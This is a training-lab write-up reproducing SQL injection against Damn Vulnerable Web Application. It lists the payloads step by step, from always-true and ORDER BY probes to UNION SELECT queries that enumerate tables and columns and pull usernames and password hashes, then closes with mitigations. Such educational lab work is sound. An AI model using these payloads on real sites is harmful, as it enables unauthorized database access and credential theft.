This repository documents the step-by-step reproduction of a SQL Injection vulnerability using Damn Vulnerable Web Application (DVWA). The purpose of this lab was to understand how improperly validated user input can allow attackers to manipulate backend SQL queries and extract sensitive database information.
The objective of this lab was to:
-
Identify the presence of a SQL Injection vulnerability
-
Exploit the vulnerability to extract database information
-
Understand how attackers can enumerate databases, tables, columns, and user credentials
-
Observe the real-world risks posed by SQL Injection attacks
-
Damn Vulnerable Web Application (DVWA)
-
Web Browser
-
Kali Linux
-
DVWA URL: http://10.6.6.13
-
Login Credentials:
-
Username: admin
-
Password: password
-
Security Level: Low
-
Log in to DVWA
-
Click DVWA Security from the left menu
-
Set security level to Low
-
Click Submit
Navigate to SQL Injection from the left pane.
Payload used:
' OR 1=1 #
Observation: All user records were returned instead of a single user, confirming the application is vulnerable to SQL Injection.
Explanation: The payload contains an βalways trueβ condition, which forces the database to return all rows.
To successfully use a UNION-based SQL injection, the number of columns in the original query must be known.
Payloads tested:
1' ORDER BY 1 #
1' ORDER BY 2 #
1' ORDER BY 3 #
Result:
-
ORDER BY 1 β Successful
-
ORDER BY 2 β Successful
-
ORDER BY 3 β Error: Unknown column '3' in 'order clause'
β This confirms the query contains two columns.
Payload used:
1' OR 1=1 UNION SELECT 1, VERSION()#
Result:
5.5.58-0+deb8u1
Finding:
DBMS: MySQL
Version: 5.5.58
OS: Debian-based system
Payload used:
1' OR 1=1 UNION SELECT 1, DATABASE()#
Result:
dvwa
Finding: The database name is dvwa.
Payload used:
1' OR 1=1 UNION SELECT 1, table_name
FROM information_schema.tables
WHERE table_type='base table'
AND table_schema='dvwa'#
Observation: Multiple table names were returned, including a table named users, which is likely to store credentials.
Payload used:
1' OR 1=1 UNION SELECT 1, column_name
FROM information_schema.columns
WHERE table_name='users'#
Observation: Column names discovered included:
user
password
first_name
last_name
π Important columns for exploitation:
user
password
Payload used:
1' OR 1=1 UNION SELECT user, password FROM users#
Result: Usernames and password hashes were successfully retrieved.
Finding: This demonstrates how attackers can steal credential data if SQL Injection vulnerabilities are not mitigated.
-
The application did not validate or sanitize user input
-
SQL queries were executed directly from user-supplied data
-
Sensitive information such as:
-
Database name
-
Table names
-
Column names
-
-
User credentials could be extracted by an attacker
-
The vulnerability exists due to insecure coding practices
-
SQL Injection vulnerabilities can lead to:
-
Unauthorized data disclosure
-
Credential theft
-
Privilege escalation
-
Complete database compromise
-
Loss of user trust and legal consequences
This lab demonstrated how dangerous SQL Injection vulnerabilities can be when applications fail to properly validate user input. By exploiting a simple input field, it was possible to enumerate the entire database structure and retrieve sensitive user credentials.
Understanding this attack helps security professionals identify weaknesses and implement effective countermeasures such as prepared statements, input validation, and least-privilege database access.
Training Program: #parocyber